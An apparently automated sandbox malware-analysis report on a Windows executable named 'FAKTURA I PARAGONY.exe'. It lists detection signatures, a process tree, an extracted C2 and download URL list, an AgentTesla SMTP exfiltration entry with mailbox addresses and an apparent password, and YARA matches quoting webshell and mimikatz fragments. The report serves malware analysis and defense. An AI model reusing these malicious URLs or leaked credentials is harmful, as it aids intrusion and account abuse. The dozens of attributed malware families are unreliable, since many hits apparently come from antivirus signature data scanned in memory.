Play interactive tour

Edit tour

Windows Analysis Report FAKTURA I PARAGONY.exe

Overview

General Information

Sample Name:	FAKTURA I PARAGONY.exe
Analysis ID:	1622
MD5:	0277ce10266c718b31d46a622acf1a43
SHA1:	f9a05406e2407434e5359a8757d6f2bf0166b20e
SHA256:	1113efa42a416df493d712368060e751482e644c13f6c115a507ff001a322724
Infos:
Most interesting Screenshot:

Detection

RemCom RemoteAdmin Mimikatz HawkEye Imminent Nanocore Remcos AESCRYPT Ransomware

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected PasteDownloader

Detected Hacktool Mimikatz

Yara detected BlackMoon Ransomware

Yara detected Snake Keylogger

Yara detected Ragnarok ransomware

Yara detected Evrial Stealer

Yara detected Avaddon Ransomware

Yara detected Mini RAT

Yara detected BLACKMatter Ransomware

Yara detected Koadic

Yara detected Jigsaw

Yara detected GABUTS Ransomware

Antivirus detection for URL or domain

Yara detected AESCRYPT Ransomware

Yara detected RansomwareGeneric

Yara detected Ouroboros ransomware

Yara detected LimeRAT

Yara detected GuLoader

Yara detected Chaos Ransomware

Yara detected Hancitor

Found malware configuration

Yara detected Mock Ransomware

Yara detected Conti ransomware

Yara detected Generic Dropper

Yara detected NoCry Ransomware

Yara detected ByteLocker Ransomware

Yara detected RegretLocker Ransomware

Yara detected Meterpreter

Yara detected Clop Ransomware

Yara detected Xmrig cryptocurrency miner

Yara detected LockBit ransomware

Yara detected LOCKFILE ransomware

Yara detected Cerber ransomware

Yara detected Rhino ransomware

Yara detected Buran Ransomware

Yara detected VHD ransomware

Yara detected generic Shellcode Injector

Yara detected Netwalker ransomware

Yara detected Vidar stealer

Yara detected Jcrypt Ransomware

Yara detected Delta Ransomware

Yara detected Predator

Yara detected Mimikatz

Detected HawkEye Rat

Detected Remcos RAT

Sigma detected: RegAsm connects to smtp port

Yara detected RevengeRAT

Yara detected LaZagne password dumper

Yara detected Metasploit Payload

Yara detected LazParking Ransomware

Yara detected Neshta

Yara detected Discord Token Stealer

Yara detected MailPassView

Yara detected Parallax RAT

Yara detected Zeppelin Ransomware

Yara detected Apis Ransomware

Yara detected Wannacry ransomware

Yara detected AgentTesla

Yara detected MegaCortex Ransomware

Yara detected Valak

Yara detected AntiVM3

Yara detected Cobra Locker ransomware

Yara detected RekenSom ransomware

Detected Nanocore Rat

Yara detected Babuk Ransomware

Yara detected Nemty Ransomware

Yara detected NetWire RAT

Yara detected Linux EvilGnome RC5 key

Yara detected Clay Ransomware

Yara detected Thanos ransomware

Yara detected CryLock ransomware

Yara detected Pony

Yara detected Sapphire Ransomware

Yara detected OCT Ransomware

Yara detected Snatch Ransomware

Yara detected VBKeyloggerGeneric

Yara detected Silvertor Ransomware

Yara detected Coinhive miner

Yara detected Annabelle Ransomware

Yara detected Gocoder ransomware

Detected Imminent RAT

Yara detected BitCoin Miner

Yara detected WannaRen ransomware

Multi AV Scanner detection for submitted file

Yara detected Ryuk ransomware

Yara detected Porn Ransomware

Yara detected DarkSide Ransomware

Malicious sample detected (through community Yara rule)

Yara detected HiddenTear ransomware

Yara detected Telegram RAT

Yara detected Mailto ransomware

Yara detected CoronaCrypt Ransomware

Yara detected Voidcrypt Ransomware

Yara detected Njrat

Yara detected GoGoogle ransomware

Yara detected Axiom Ransomware

Yara detected Artemon Ransomware

Yara detected Betabot

Yara detected Covid19 Ransomware

Yara detected UACMe UAC Bypass tool

Yara detected AveMaria stealer

Yara detected Nukesped

Yara detected LokiLocker Ransomware

Yara detected Cryptolocker ransomware

Yara detected Marvel Ransomware

Multi AV Scanner detection for domain / URL

Yara detected Codoso Ghost

Yara detected Cute Ransomware

Yara detected Growtopia

Yara detected Xorist ransomware

Yara detected Windows Security Disabler

Yara detected Dorkbot

Contains VNC / remote desktop functionality (version string found)

Yara detected MaliciousMacro

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Yara detected Costura Assembly Loader

May modify the system service descriptor table (often done to hook functions)

Yara detected AllatoriJARObfuscator

Found many strings related to Crypto-Wallets (likely being stolen)

Found potential ransomware demand text

Tries to steal Mail credentials (via file access)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Hides threads from debuggers

Writes to foreign memory regions

Yara detected MSILLoadEncryptedAssembly

Binary or sample is protected by dotNetProtector

C2 URLs / IPs found in malware configuration

May enable test signing (to load unsigned drivers)

Deletes shadow drive data (may be related to ransomware)

Found strings related to Crypto-Mining

Tries to detect Any.run

Found Tor onion address

Tries to harvest and steal browser information (history, passwords, etc)

Found string related to ransomware

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal ftp login credentials

Yara detected VB6 Downloader Generic

Contains functionality to hide user accounts

Yara detected BatToExe compiled binary

May drop file containing decryption instructions (likely related to ransomware)

Yara detected Autohotkey Downloader Generic

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Antivirus or Machine Learning detection for unpacked file

Drops certificate files (DER)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

Drops PE files

Tries to load missing DLLs

Checks if the current process is being debugged

May initialize a security null descriptor

Queries the volume information (name, serial number etc) of a device

Deletes files inside the Windows folder

Contains functionality to query the security center for anti-virus and firewall products

Found dropped PE file which has not been started or loaded

Yara detected RemCom RemoteAdmin tool

IP address seen in connection with other malware

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Installs a raw input device (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

Contains strings related to BOT control commands

Detected TCP or UDP traffic on non-standard ports

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Uses Microsoft's Enhanced Cryptographic Provider

Yara detected Winexe tool

Contains functionality to detect virtual machines (SGDT)

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains long sleeps (>= 3 min)

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

Yara detected Keylogger Generic

Creates a process in suspended mode (likely to inject code)

Uses 32bit PE files

Yara signature match

Creates files inside the system directory

May infect USB drives

Internet Provider seen in connection with other malware

Yara detected Credential Stealer

AV process strings found (often used to terminate AV products)

PE file does not import any functions

Uses SMTP (mail sending)

Enables security privileges

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64native

FAKTURA I PARAGONY.exe (PID: 9200 cmdline: 'C:\Users\user\Desktop\FAKTURA I PARAGONY.exe' MD5: 0277CE10266C718B31D46A622ACF1A43)

RegAsm.exe (PID: 420 cmdline: 'C:\Users\user\Desktop\FAKTURA I PARAGONY.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)

conhost.exe (PID: 368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

UserOOBEBroker.exe (PID: 8528 cmdline: C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding MD5: BCE744909EB87F293A85830D02B3D6EB)

mpam-51041e98.exe (PID: 6724 cmdline: 'C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-51041e98.exe' /q WD MD5: C4DB3EC80A8918D80B802B6DA145FD82)

MpSigStub.exe (PID: 7120 cmdline: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe /stub 1.1.18500.10 /payload 1.351.265.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-51041e98.exe /q WD MD5: 01F92DC7A766FF783AE7AF40FD0334FB)

wevtutil.exe (PID: 1568 cmdline: C:\Windows\system32\wevtutil.exe uninstall-manifest C:\Windows\TEMP\03B8EEFF-063F-7FBE-74AE-B9DD32097DDC.man MD5: C57C1292650B6384903FE6408D412CFA)

conhost.exe (PID: 8996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

wevtutil.exe (PID: 3992 cmdline: C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\03B8EEFF-063F-7FBE-74AE-B9DD32097DDC.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' MD5: C57C1292650B6384903FE6408D412CFA)

conhost.exe (PID: 3892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "margaridasantos@tccinfaes.comTccBps1427logmail.tccinfaes.comkevinlog25@gmail.com"}

Threatname: Pony

{"C2 list": ["http://batrasiaku.blogspot.com/", "http://%s/files/", "http://u.to/PbrTEg", "http://%s:%i%s", "http://www.goldwindos2000.com/krratwo/hker.htm", "http://www.bluelook.es/bvvtbbh.php", "http://instituthypnos.com/maps1316/ki_d/", "http://cs.zhongsou.com/", "http://203.199.200.61", "http://31.192.209.", "http://92.222.7.", "http://animefrase.blogspot.com/", "http://www.scanztech.com/wp-content/themes/twentytwelve/inc/msg.jpg", "http://46.101.202.232/wp-includes/mx_ib/", "http://worm.ws", "http://bonkersmen.blogspot.com/", "http://page.zhongsou.com/ps?tps=2&cc=%s&aid=CA%s&w=", "http://110.42.4.180:", "http://3dplayful.blogspot.com/ ", "http://efficientlifechurch.com/.well-known/pki-validation/msg.jpg", "http://www.trotux.com/?z=", "http://cts.hotbar.com/trackedevent.aspx", "http://www.3322.org/dyndns/getip", "http://%s%simg.jpg", "http://8nasrcity.blogspot.com/ ", "http://cicahroti.blogspot.com/ ", "http://www.norton-kaspersky.com/trf/tools", "http://www.xpassgenerator.com/software/d", "http://3dcpw.net/house/404.htm", "http://f1visa.info/cd/cd.php?id=%s&ver=g", "http://tool.world2.cn/toolbar/", "http://72.29.80.113/~nossacai/", "http://scud.pipis.net/", "http://best4hack.blogspot.com/ ", "http://update.7h4uk.com:443/antivirus.php", "http://tokziraat.com/templates/kallyas/images/favicons/msg.jpg", "http://somnathskider.com/wp-content/themes/oceanwp/assets/css/edd/msg", "http://greenertrack.info/.well-known/acme-challenge/hp.gf", "http://goatse.ragingfist.net/", "http://citw-vol2.blogspot.com/ ", "http://%s:%d/PUT[%s]/FC001/%s", "http://oo.shmtb.info:888/phone.exe\\soft", "http://32player.com", "http://31.192.211.", "http://200.159.128.", "http://www.klikspaandelft.nl/", "http://3s249.s249327.96.lt/mss2ro37qtl3cbw9vo0lk2bx8vv7jmx2mlesim9ddw11fem3sjp3ijuoufk/mss.php", "http://march262020.club/files/", "http://aristocrat.furniture/wp-content/themes/oceanwp/woocommerce/car", "http://www.enquesta.tempsdoci.com/tracking-number-7fjs84476372436909/mar-13-18-04-02-56", "http://nownowsales.com/wp-admin/ulpbz/", "http://errors.statsmyapp.com", "http://metznr.co/tor/index.php", "http://w.woc4b.com", "http://spotdewasa.blogspot.com/", "http://vaytiennhanhvungtau.com/.well-known/acme-challenge/gr.mpwq", "http://dudethisishowwedoitallnightlong.2myip.net", "http://www.staging.pashminadevelopers.com/wp-admin/g_j/", "http://down.admin7a57a5a743894a0e.club/4.exe", "http://downloadfilesldr.com/index2.php?adv=141", "http://%76%2E%79%61%6F%36%33%2E%63%6F%6D/url.asp", "http://www.lumina.it/wp-content/plugins/all-in-one-wp-migration/storage/client/invoice-978561/", "http://articlunik.blogspot.com/", "http://www.webflora.co.kr/slog/skin/setup.ini", "http://%domain%/config.php", "http://pig.zhongsou.com/helpsimple/help.htm", "http://beautifulmaori.co.nz/wp-content/plugins/wp-xmll_2/gorfy2pq/1ny0mnkih27id8m.ktk", "http://%s?u=%s&m=%s&action=find", "http://www.jplineage.com/firo/mail.asp?tomail=163@163.com&mailbody=", "http://update.xiaoshoupeixun.com/tsbho.ini", "http://www.chipsroofingloveland.com/status/services-06-26-18-new-customer-vh/", "http://march262020.com/files/", "http://aspeja.org/question/", "http://detayworx.com/_vsnpNgyXp84Os8Xh.php", "http://www.pornpassmanager.com/d", "http://gicia.info/cd/cd.php?id=%s&ver=g", "http://www.sqwire.com", "http://interface.kokmobi.com/newservice", "http://ios-update-whatsapp.com", "http://nfinx.info", "http://arifkacip.blogspot.com/ ", "http://www.google.com.br", "http://activecodec.0fees.net/codec/mp3/codec_download.htm", "http://aindonashi.blogspot.com/", "http://www.direct-ip.com/", "http://%s:%d/%d%s", "http://voguextra.com", "http://autothich.blogspot.com/ ", "http://www.phokhobazan.com/%202%200%201%208-0%207%20-%201%201%202%200%200%207:%202%206:%2099%20819.php/?email=kevind@hollywoodwoodwork.com\"target=\"_blank", "http://so1.5k5.net/interface?action=install&p=", "http://www.zixzelz1.narod.ru/", "http://a.pomf.cat/", "http://masgiO.info/cd/cd.php?id=%s&ver=g", "http://www.CollakeSoftware.com", "http://%s:%i%s?mod=cmd", "http://www.2345.com", "http://wevx.xyz/post.php?uid=", "http://tempuri.org/", "http://104.236.94.", "http://santasalete.sp.gov.br/jss/", "http://www.ssl-256mail.host/5c596a68b83a886b57ade24c?jgiasyi=&pwnmiz_g=1eo3fjfkkke&jgiasyi=wtnygzsiyw", "http://jay6.tech/wp-content/themes/twentynineteen/template-parts/cont", "http://hostthenpost.org/uploads/", "http://179.43.158.187/PhtJFr0fvBk2.php", "http://twitck.com", "http://allankhall.com/templates/beez3/language/en-gb/msg.jpg", "http://nathannewman.org/wp-content/themes/boldnews/includes/js/msg.jpg", "http://aancyber77.blogspot.com/", "http://berkah2013.blogspot.com/", "http://51.255.155.1/pages/filecloud/5e2d7b130cf4feb03023e580b3432fa9d71d7838.exe", "http://%s/any2/%s-direct.ex", "http://www.w3.org/1999/xsl/transform", "http://code.google.com/p/b374k-shell*/$s_pass=", "http://i.compucrush.com/i.php", "http://%s/v_install?sid=16045&start=1&guid=$__GUID&sig=$__SIG&ovr=$__OVR&browser=$__BROWSER&label=%s&aux=%d", "http://funsiteshere.com/redir.php", "http://95.173.183.", "http://mydirecttube.com/", "http://cvfanatic.blogspot.com/ ", "http://zz.8282.space/nw/ss/", "http://50.63.128.", "http://www.niudoudou.com/web/download/", "http://dl.dropbox.com/u/", "http://bloodybits.com/edwinjefferson.com/ie_xo/", "http://vidquick.info/cgi/", "http://178.128.115.182/wp-includes/3_y/", "http://xn--", "http://devee.emlnk.com/lt.php?s=b7abe8a8120881cc5c9dab6eac28ddbe&amp;i=1a3a1a", "http://216.172.172.40/~agora546/cardoso/dilma.zip", "http://lightday.pl/wp-content/themes/lightday/images/msg.jpg", "http://tinyurl.com/", "http://ow.ly/QoHbJ", "http://khaleejposts.com/rgk/m_rs/", "http://fateh.aba.ae/xyzx.zip", "http://tsrv1.ws", "http://directplugin.com/dialers/", "http://tak-tik.site/crun20.gif", "http://www.youndoo.com/?z=", "http://w.w3c4f.com", "http://count.key5188.com/vip/get.asp?mac=", "http://ms365box.com/update.1", "http://5starvideos.com/main/", "http://www.whitehouseknutsford.co.uk/invoice-status/please-pull-invoice-684594/", "http://www.22teens.com/", "http://contentedmerc.xyz/BAYgODA0NUQ2OEY1RTA2ODg4RDhCQzlEQzRBRUU3QTA5OUI=", "http://downloadfilesldr.com/index5.php?adv=141", "http://downloadfilesldr.com/index3.php?adv=141", "http://server00.send6.com/1abf8588/oluwa.exe", "http://www.microsoft.com0", "http://evanstechnology.com", "http://3.0.242.71/wp-content/2_ur/", "http://sf3q2wrq34.ddns.net", "http://suckjerkcock.date", "http://download.zhongsou.com/cdsearch/", "http://20vp.cn/moyu/", "http://vequiato.sites.uol.com.br/", "http://gveejlsffxmfjlswjmfm.com/files/", "http://localhost:62338/Chipsetsync.asmx", "http://www.comeinbaby.com/app/app.php?sn=%s&pn=%s&mn=%s&pv=%s&appid=%s&os=macservice&pt=%s&msn=%@&yy=%s", "http://adaptservices.net/qwao8cj4gkogu", "http://hytechmart.com", "http://www.al-enayah.com/ssfm", "http://downloadfilesldr.com/allfile.jpg", "http://spywaresoftstop.com/download/141/setup.exe", "http://bogle.com';*/varstr='javascript';str=rrr;l=str.length;while(ccc<=str.length-1){/*dfkjhsjkdfhgkjhioewqpoasncad;*/svs=svm.charat(scnt%7+55);svs=svm.charat(scnt%7);ccc=ccc+6-2-4;/*eiofybajdhaasdhflaeuadsjkhf*/while(str.charat(ccc)!=svs){temp=temp+str.charat(ccc++);/*sdfaopekdlsnvasdjfpoewsdjaskdjf*/}scnt++;/*kdfljgoerijklasdfjkasdkjfhasdhkfj*/ccc++;ccc--;ccc++;if(ccc!=(ccc+3))out=out+string.fromcharcode(((parseint(temp,16)-1)));elsealert('error');ccc=2*ccc-ccc", "http://ip-api.com/json/", "http://www.", "http://fortisdesigns.com/5ox6oyzzslcp", "http://bigboobsp.blogspot.com/ ", "http://www.zhongsou.com/kefu/zskf.htm", "http://pssquared.com/invoice-status/tracking-number-and-invoice-of-your-order/", "http://coltaddict.blogspot.com/", "http://%domain%/update.php", "http://chemgioaz.blogspot.com/ ", "http://arthisoft.blogspot.com/ ", "http://service.srvmd6.com/Mac/getInstallerSettings/?version=", "http://lo0oading.blogspot.com/ ", "http://checkip.dyndns.org/", "http://pages", "http://stmichaelolivewood.com/templates/landofchrist/css/msg.jpg", "http://majelisalanwar.org/wp-content/themes/foodica/assets/css/hp.gf", "http://seuufhehfueughek.ws/", "http://%s%s?search=%s", "http://2010-kpss.blogspot.com/ ", "http://scarecrowlawncare.com/wp-content/themes/sensible-wp/img/gr.mpwq", "http://www.thon-samson.be/js/_notes/", "http://babukq4e2p4wu4iq.onion", "http://traducerejuridica.ro/tenlxhlzpagc/625986.png", "http://led21.pro/wp-content/themes/betheme/images/headers/msg.jpg", "http://techwach.com", "http://www.ip2location.com/", "http://fateh.aba.ae/abc.zip", "http://ankarahurdacim.com/wp-admin/3yk1/", "http://208.95.104.", "http://wmwifbajxxbcxmucxmlc.com/files/", "http://michiganpppp.com/work/doc/9.doc", "http://www.88vcd.com/htm/china/myb/send.asp?daqu=%s&xiaoqu=%s&user=%s&pass=%s&ckpass=%s&renwu=%s&level=%d&gold=%d&stone=%d&cpname", "http://te.platrium.com/pte.aspx", "http://cl.1ck.me/", "http://hotedeals.co.uk/ekck095032/", "http://scrollayer.com", "http://stat.wamme.cn/C8C/gl/cnzz60.html", "http://www.hasandanalioglu.com/wp-content/n_v/", "http://agressor58.blogspot.com/", "http://batysnewskz.kz/ups.com", "http://xn----dtbhbqh9ajceeeg2m.org/components", "http://www.bookiq.bsnl.co.in/data_entry/circulars/m", "http://b-compu.de/templates/conext/html/com_contact/contact/msg.jpg", "http://1bestgate.blogspot.com/ ", "http://www.sacbarao.kinghost.net/", "http://spy-kill.com/bho_adult.txt", "http://gosgd2.com", "http://gg", "http://whatami.us.to/tc", "http://www.g00gleadserver.com/list.txt", "http://barely-art.com/wp-content/themes/pennews/languages/msg.jpg", "http://maplestory.nexon.com", "http://181.174.166.137/sys/f4.exe", "http://%s:%d/FC001/%s", "http://www.agendagyn.com/media/fotos/2010/", "http://pursuitvision.com/templates/pursuitvision/images/hybrid-app/ms", "http://209.141.35.239/33/", "http://worm.ws/", "http://basti.ciseducation.org/website/images/prettyphoto/dark_square/.x1-unix/", "http://tumicy.com/plqijcndwoisdhsaow/", "http://megatoolbar.net/inetcreative/", "http://microsoft.erlivia.ltd/jikolo.doc", "http://ahmad-roni.blogspot.com/", "http://gaigoixxx.blogspot.com/ ", "http://www.preyer.it/ups.com/", "http://bln8225.casacam.net/zxqjhjubakff/", "http://31.192.210.", "http://bittupadam.blogspot.com/", "http://session-dyfm.clientmsg13.review/8446c35a41f9e820533b6cd008b40749?fpcum=&amp;dyfm=ywx2yxjvx3zlbgfzy29adndylmnvbq==&amp;dyfm=cpjyicit", "http://vod.7ibt.com/index.php?url=", "http://thankyou.orderreceipts.square7.ch/applica.exe", "http://200.98.", "http://lialer.com/wFBIQQUccZOdYQKJvhxm/ejrwqokckt.exe", "http://srmvx.com.br/uploads/", "http://spywaresoftstop.com/wfdfdghfdghj.htm", "http://speedmasterprinters.co.za/erroreng/erroreng/erroreng/erroreng/ii.php", "http://referfile.com", "http://dimas.stifar.ac.id/vjrzzufsu/", "http://afkar.today/test_coming.training/w_f/", "http://sahane34sohbet.000webhostapp.com/wp-content/themes/elbee-elgee", "http://muacangua.com/wp-admin/o_n/", "http://(www|corail)\\\\.sudoc", "http://incredicole.com/wp-content/themes/elegant-grunge/images/msg.jpg", "http://xn----9sblbqqdv0a5a8fwb.xn--p1ai/includes/", "http://fu.o3sb.com:9999/img.jpg", "http://abeidaman.blogspot.com/ ", "http://aitimatafb.blogspot.com/", "http://microhelptech.com/gotoassist/", "http://www.wuweixian.com/we_down/k2_v/", "http://94.103.85.236/ds/11.gif", "http://wpitcher.com", "http://maithanhduong.com/.well-known/pki-validation/msg.jpg", "http://gpt.alarmasystems.ru/wp-content/upgrade/obi.html", "http://5starvideos.com/main/K", "http://claus-wieben.de/sdor1om4hl5naz", "http://nevergreen.net/456", "http://www.general-insurance.net/wp-content/themes/general-ins-net/po", "http://hiltrox.com", "http://jiaozhu", "http://acayipbiri.blogspot.com/", "http://aolopdephn.blogspot.com/", "http://zilmaraalencar.com.br/layouts/plugins/editors/tinymce/field/zzurphy.php", "http://int.dpool.sina.com.cn/iplookup/iplookup.php", "http://freeunweb.pro/FreeUnWeb.exe", "http://81.177.26.20/ayayay", "http://www.getip.pw", "http://61.19.253.", "http://dqbdesign.com/wp-admin/cu_sa/", "http://faithhotelghana.com", "http://sameshitasiteverwas.com/traf/tds/in.cgi", "http://downloadfilesldr.com/index4.php?adv=141", "http://alhalm-now.blogspot.com/", "http://62.210.214.", "http://dmww.dmcast.com/script/update.asp?version=%s", "http://stilldesigning.com/wp-content/themes/stilldesigning-2014/langu", "http://appswonder.info", "http://www.colegioarbitrosargentinos.com.ar/img/overdue-account/invoice-053541/", "http://tonisantafe.com/wp-content/themes/lobo/woocommerce/cart/msg.jpg", "http://18.130.111.206/wp/x_y/", "http://traducerejuridica.ro/tenlxhlzpagc/D", "http://dontkillme/", "http://www.diannaowang.com:8080", "http://www.friskypotato.com/", "http://www.lindenmontessori.com/cgi-bin/hr_9x/", "http://alindaenua.blogspot.com/", "http://bgtc.pctonics.com", "http://anomaniez.blogspot.com/ ", "http://darkside", "http://upd.", "http://capsnit.com", "http://200.63.45.105/duiss/duiss", "http://webpatch.ragnarok.co.kr/", "http://spywaresoftstop.com/load.php?adv=141", "http://avnisevinc.blogspot.com/", "http://config.juezhao123.com/c.ashx?ver=&c=", "http://count.key5188.com/", "http://www.qq994455.com/", "http://gosgd.com", "http://whenyouplaygood.com/s/gate.php?a\");f[\"\\x73\\x65\\x6e\\x64\"]();eval(f[\"responsetext\"", "http://superbit.rs/wp-content/themes/one-page/js/gr.mpwq", "http://www.consumerinput.com/", "http://10.103.2.247", "http://sonharvaleapena.com.br/en_us/copy_invoice/25680423862/dqzln-cwhrf_yagnf-spn", "http://www.orkut.com", "http://metclix.com", "http://advancedtopmax.info/e/59034b87bbb71/59034b87bbbcc.bin", "http://tsrv4.ws/", "http://ios-certificate-update.com", "http://94.102.14.", "http://d1.downxia.net/products/", "http://iranvision1404.com/ss/info/redebit_transactions/terms/kohc-xuxo_lcxty-av6e", "http://mitotl.com.mx/ups.com/", "http://rebrand.ly/ohxnqak", "http://ashevillefusion.com/obngakydblpj", "http://xn---82-qdd0akcfirgv4j.xn--p1ai/ups-ship-notification/mar-13-18-07-06-38/"]}

Threatname: CryLock

{"Extensions": "trigger reboot 6[CC-Client] Command: REBOOT received"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000023.00000003.6336769092.0000028BD7D54000.00000004.00000001.sdmp	CredTheft_MSIL_ADPassHunt_2	unknown	FireEye	0x15656:$pdb1: \ADPassHunt\ 0x15667:$pdb2: \ADPassHunt.pdb 0x1567b:$s1: Usage: .\ADPassHunt.exe 0x15697:$s2: [ADA] Searching for accounts with msSFU30Password attribute 0x156d7:$s3: [ADA] Searching for accounts with userpassword attribute 0x15714:$s4: [GPP] Searching for passwords now
00000023.00000003.6336769092.0000028BD7D54000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000023.00000003.6313733707.0000028BD7280000.00000004.00000001.sdmp	webshell_php_by_string_obfuscation	PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming	Arnim Rupp	0x4d2e:$opbs48: se'.(32*2) 0x576f:$php_short: <? 0x576f:$php_new2: <?php
00000023.00000003.6313733707.0000028BD7280000.00000004.00000001.sdmp	webshell_asp_obfuscated	ASP webshell obfuscated	Arnim Rupp	0x4831:$asp_obf2: u"+"n"+"s 0x4b6a:$tagasp_short1: <%e 0x4b81:$tagasp_short2: %> 0x4b6a:$tagasp_long12: <%ex 0x4172:$tagasp_long20: <scriptlanguage="vb 0x580c:$asp_payload2: eval( 0x4254:$asp_payload8: execute( 0x429e:$asp_payload8: execute( 0x4b1f:$asp_payload8: execute( 0x58a7:$asp_multi_payload_one3: .run 0x6709:$asp_multi_payload_one3: .run 0x7aaa:$asp_multi_payload_one3: .run
00000023.00000003.6313733707.0000028BD7280000.00000004.00000001.sdmp	webshell_asp_generic	Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file	Arnim Rupp	0x6359:$asp_much_sus8: Webshell 0x7fbd:$asp_much_sus8: Webshell 0x4831:$asp_much_sus39: u"+"n"+"s 0x4b7b:$asp_gen_sus10: "cmd" 0x5730:$asp_gen_sus12: %comspec% 0x40f2:$asp_gen_obf1: "+" 0x458e:$asp_gen_obf1: "+" 0x45d9:$asp_gen_obf1: "+" 0x45e4:$asp_gen_obf1: "+" 0x45ef:$asp_gen_obf1: "+" 0x4624:$asp_gen_obf1: "+" 0x462f:$asp_gen_obf1: "+" 0x463a:$asp_gen_obf1: "+" 0x466f:$asp_gen_obf1: "+" 0x467a:$asp_gen_obf1: "+" 0x4685:$asp_gen_obf1: "+" 0x46ba:$asp_gen_obf1: "+" 0x46c5:$asp_gen_obf1: "+" 0x46d0:$asp_gen_obf1: "+" 0x4705:$asp_gen_obf1: "+" 0x4710:$asp_gen_obf1: "+"
00000023.00000003.6334830370.0000028BD7708000.00000004.00000001.sdmp	webshell_asp_generic_eval_on_input	Generic ASP webshell which uses any eval/exec function directly on user input	Arnim Rupp	0x17c5e:$payload_and_input1: eval(request. 0x17c5c:$tagasp_short1: <%e 0x17c81:$tagasp_short2: %> 0x17c5c:$tagasp_long13: <%ev 0xa213:$jsp4: public 0xa271:$jsp4: public
00000023.00000003.6334830370.0000028BD7708000.00000004.00000001.sdmp	webshell_asp_generic	Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file	Arnim Rupp	0x17c9b:$asp_much_sus8: WebShell 0x29d8:$asp_much_sus15: AntiVirus 0x30fc:$asp_much_sus15: AntiVirus 0x3f25:$asp_much_sus15: antivirus 0x4002:$asp_much_sus15: antivirus 0x4016:$asp_much_sus15: antivirus 0xd80f:$asp_much_sus15: Antivirus 0x17c77:$asp_much_sus18: "unsafe 0x18620:$asp_much_sus28: exploit 0x1645e:$asp_gen_sus11: "cmd.exe 0x170a5:$asp_gen_sus11: "cmd.exe 0x182f8:$asp_gen_sus12: %comspec% 0x17cc0:$asp_gen_sus25: shell_ 0x17d83:$asp_gen_obf1: "+" 0x18198:$asp_gen_obf1: "+" 0x1819d:$asp_gen_obf1: "+" 0x181a3:$asp_gen_obf1: "+" 0x181aa:$asp_gen_obf1: "+" 0x181af:$asp_gen_obf1: "+" 0x181b4:$asp_gen_obf1: "+" 0x17c5c:$tagasp_short1: <%e
00000023.00000003.6334830370.0000028BD7708000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmp	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0xfe44:$s12: sekurlsa::tickets
00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmp	webshell_asp_generic_eval_on_input	Generic ASP webshell which uses any eval/exec function directly on user input	Arnim Rupp	0xf7a8:$payload_and_input2: execute(request( 0xf23b:$tagasp_short1: <%v 0xf7a6:$tagasp_short1: <%e 0x15639:$tagasp_short1: <%R 0x39de0:$tagasp_short1: <%\x03 0x3ab04:$tagasp_short1: <%\xC0 0x8f1a:$tagasp_short2: %> 0xe50c:$tagasp_short2: %> 0xf7bf:$tagasp_short2: %> 0xf7a6:$tagasp_long12: <%ex 0x1b410:$jsp4: public 0x1b797:$jsp4: public
